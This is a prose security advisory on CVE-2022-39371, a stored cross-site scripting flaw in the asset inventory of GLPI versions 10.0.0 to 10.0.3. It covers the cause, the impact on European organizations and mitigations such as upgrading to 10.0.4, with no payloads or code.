CVE-2022-39371 is a medium-severity vulnerability classified under CWE-80, which pertains to improper neutralization of script-related HTML tags in a web page, commonly known as a basic Cross-Site Scripting (XSS) vulnerability. This vulnerability affects the GLPI software, an open-source IT asset and service management tool widely used for ITIL service desk functions, license tracking, and software auditing. Specifically, the issue arises from insufficient sanitization of script-related HTML tags within the assets inventory information. This flaw allows an attacker to inject malicious scripts into the web interface, which can then be executed in the context of users viewing the affected pages. The vulnerability affects GLPI versions starting from 10.0.0 up to but not including 10.0.4, where the issue has been patched. No known exploits are currently reported in the wild, and no workarounds exist aside from upgrading to the fixed version. The vulnerability's root cause is the failure to properly neutralize HTML tags that can execute scripts, enabling attackers to perform actions such as session hijacking, defacement, or redirecting users to malicious sites. Exploitation requires the attacker to have the ability to insert or modify asset inventory information, which may require authenticated access depending on the deployment's configuration. However, once exploited, the impact can affect the confidentiality and integrity of user sessions and data within the GLPI environment.

For European organizations, the impact of this vulnerability can be significant, especially for those relying heavily on GLPI for IT asset management and service desk operations. Successful exploitation could lead to unauthorized access to sensitive IT management data, session hijacking of administrative users, and potential lateral movement within the network. This could disrupt IT service management processes, compromise the integrity of asset inventories, and expose confidential information such as software licenses and audit data. Given that GLPI is often integrated with other IT management and monitoring tools, the ripple effect could extend beyond the immediate application, potentially affecting broader IT infrastructure. The vulnerability could also be leveraged as a foothold for further attacks, including phishing or malware deployment, particularly in environments where GLPI is accessible over the internet or insufficiently segmented internally. The absence of known exploits reduces immediate risk, but the medium severity and ease of exploitation through web interface injection necessitate prompt remediation to prevent potential targeted attacks.

The primary and most effective mitigation is to upgrade GLPI installations to version 10.0.4 or later, where the vulnerability has been patched. Organizations should prioritize this update in their patch management cycles. Additionally, to reduce risk before patching, organizations can implement strict input validation and output encoding on any custom integrations or plugins interacting with GLPI's asset inventory data. Deploying Web Application Firewalls (WAFs) with rules to detect and block common XSS payloads targeting GLPI endpoints can provide a temporary protective layer. Restricting access to the GLPI interface to trusted networks and enforcing strong authentication and role-based access controls can limit the attack surface. Regularly auditing asset inventory inputs for suspicious or malformed data entries can help detect attempted exploitation. Finally, educating users and administrators about the risks of XSS and monitoring logs for unusual activity related to GLPI can enhance early detection and response capabilities.